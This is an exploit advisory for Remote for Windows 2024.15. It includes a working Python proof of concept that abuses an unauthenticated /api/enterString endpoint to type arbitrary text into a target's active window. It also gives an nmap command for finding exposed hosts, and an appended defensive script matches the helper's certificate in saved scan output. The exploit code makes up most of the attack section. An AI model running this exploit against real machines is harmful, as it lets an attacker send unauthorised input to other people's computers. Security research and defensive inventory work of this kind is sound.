Remote for Windows 2024.15 Unauthenticated Arbitrary Input
# Exploit Title: Remote for Windows 2024.15 - Unauthenticated Arbitrary Input into Active Window
# Date: 2025-05-23
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://rs.ltd
# Software Link: https://rs.ltd/latest.php?os=win
# Version: 2024.15
# Tested on: Windows 10/11 with Remote for Windows (helper)


'''
Description:
- The enterString API endpoint allows unauthenticated attackers to inject
raw text into the target's active window without requiring keystroke
simulation or special keycodes.
- Works when "Allow unknown devices" setting is enabled (default: disabled)


Vulnerable Component:
- The /api/enterString endpoint with missing authentication checks


# Identification:
nmap -p- -T4 <TARGET_IP> --script ssl-cert
Look for SSL cert with subject: CN=SecureHTTPServer/O=Evgeny Cherpak/C=US
'''

import requests
import urllib3
urllib3.disable_warnings()

TARGET_IP = "192.168.8.105"
TEXT_TO_INJECT = "This text appears verbatim on the target"

response = requests.post(
    f"https://{TARGET_IP}:49762/api/enterString={requests.utils.quote(TEXT_TO_INJECT)}",
    headers={
        "X-ClientToken": "unchecked",
        "X-HostName": "any",
        "X-HostFullModel": "any"
    },
    verify=False
)
print(f"Status: {response.status_code}")
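
For defenders inventorying their own network, the identification step in the description above can be applied to saved nmap output to list hosts running the helper, so the "Allow unknown devices" setting can be checked on each. This is an added example, not part of the original exploit; the function names and the sample scan output are constructed, and both the long attribute names nmap prints and the short CN/O/C form quoted above are accepted.

```python
import re

# Subject fields the advisory gives for the helper's HTTPS certificate.
FINGERPRINT = {"CN": "SecureHTTPServer", "O": "Evgeny Cherpak", "C": "US"}
# nmap's ssl-cert script prints long attribute names; map them to short ones.
ALIASES = {"commonName": "CN", "organizationName": "O", "countryName": "C"}

HOST_RE = re.compile(r"^Nmap scan report for (?:\S+ \()?([0-9a-fA-F.:]+)\)?\s*$")
PORT_RE = re.compile(r"^(\d+)/tcp\s+open\b")
SUBJ_RE = re.compile(r"^\|[ _]ssl-cert: Subject: (.+)$")


def parse_subject(text):
    """Split 'commonName=a/organizationName=b' into {'CN': 'a', 'O': 'b'}."""
    fields = {}
    for part in text.strip().split("/"):
        key, sep, value = part.partition("=")
        if sep:
            fields[ALIASES.get(key, key)] = value
    return fields


def find_helpers(nmap_output):
    """Return sorted (host, port) pairs whose certificate matches FINGERPRINT."""
    hits, host, port = set(), None, None
    for line in nmap_output.splitlines():
        if m := HOST_RE.match(line):
            host, port = m.group(1), None      # new host block starts
        elif m := PORT_RE.match(line):
            port = int(m.group(1))             # script lines below belong to this port
        elif (m := SUBJ_RE.match(line)) and host and port:
            subject = parse_subject(m.group(1))
            if all(subject.get(k) == v for k, v in FINGERPRINT.items()):
                hits.add((host, port))
    return sorted(hits)


# Constructed sample output (documentation addresses, not real scan results).
SAMPLE = """\
Nmap scan report for 192.0.2.10
49762/tcp open  unknown
| ssl-cert: Subject: commonName=SecureHTTPServer/organizationName=Evgeny Cherpak/countryName=US
Nmap scan report for intranet.example (192.0.2.20)
443/tcp open  https
| ssl-cert: Subject: commonName=intranet.example/organizationName=Example Corp/countryName=US
Nmap scan report for 192.0.2.30
49762/tcp open  unknown
| ssl-cert: Subject: CN=SecureHTTPServer/O=Evgeny Cherpak/C=US
"""
print(find_helpers(SAMPLE))
```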